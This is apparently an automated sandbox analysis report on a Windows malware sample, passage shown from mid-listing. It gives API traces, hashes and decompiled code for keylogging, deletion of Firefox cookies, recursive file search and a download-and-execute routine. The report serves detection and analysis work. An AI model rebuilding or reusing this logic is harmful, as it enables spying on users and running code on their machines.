                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                        • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                        • API String ID: 2510920776-3166941866
                                        • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                        • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                        • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 0040752D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                        • getenv.MSVCRT ref: 00407558
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                        • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                        • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                        • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                          • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                          • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                        • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                        • API String ID: 2907366228-432212279
                                        • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                        • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                        • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00404C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                        0x00404c16
                                        0x00404c18
                                        0x00404c1f
                                        0x00404c2f
                                        0x00404c39
                                        0x00404c43
                                        0x00404c4a
                                        0x00404c66
                                        0x00404c6b
                                        0x00404c70
                                        0x00404c80
                                        0x00404c83
                                        0x00404c8d
                                        0x00404e83
                                        0x00404e86
                                        0x00404e8f
                                        0x00404e98
                                        0x00000000
                                        0x00404e9e
                                        0x00404c93
                                        0x00404cb2
                                        0x00404cfa
                                        0x00404d0c
                                        0x00404d19
                                        0x00404d27
                                        0x00404d30
                                        0x00404d3f
                                        0x00404d45
                                        0x00404d4e
                                        0x00404d56
                                        0x00404d5e
                                        0x00404d5e
                                        0x00404d6b
                                        0x00404d72
                                        0x00404d7c
                                        0x00404d86
                                        0x00404d90
                                        0x00404d97
                                        0x00404d9c
                                        0x00404d9f
                                        0x00404da8
                                        0x00404db6
                                        0x00404e44
                                        0x00404e47
                                        0x00000000
                                        0x00404dbc
                                        0x00404dc3
                                        0x00404dcf
                                        0x00404dd9
                                        0x00404de2
                                        0x00404ded
                                        0x00404df0
                                        0x00404e00
                                        0x00404e08
                                        0x00404e0c
                                        0x00404e16
                                        0x00404e20
                                        0x00404e25
                                        0x00404e31
                                        0x00404e3a
                                        0x00404e42
                                        0x00404e55
                                        0x00404e5e
                                        0x00404e67
                                        0x00404e70
                                        0x00000000
                                        0x00404e76
                                        0x00000000
                                        0x00404e42
                                        0x00404db6
                                        0x00404e7d
                                        0x00000000

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                        • wcscmp.MSVCRT ref: 00404CCA
                                        • wcscmp.MSVCRT ref: 00404CE2
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                          • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,?,?), ref: 00404D7C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                        • String ID:
                                        • API String ID: 1504175218-0
                                        • Opcode ID: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                        • Opcode Fuzzy Hash: b4a4d34770c0ec194417ac69f6ada37e51486882ee5cbf665e722fa8e6873c4f
                                        • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405EB2, Relevance: 53.4, APIs: 3, Strings: 27, Instructions: 882COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                        • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                        • API String ID: 4257247948-3968991301
                                        • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                        • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                        • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                        • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D4E5, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                        • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,00000000), ref: 0040D5A2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,?,00000000), ref: 0040D5B3
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000), ref: 0040D5C0
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D5DD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040D60E
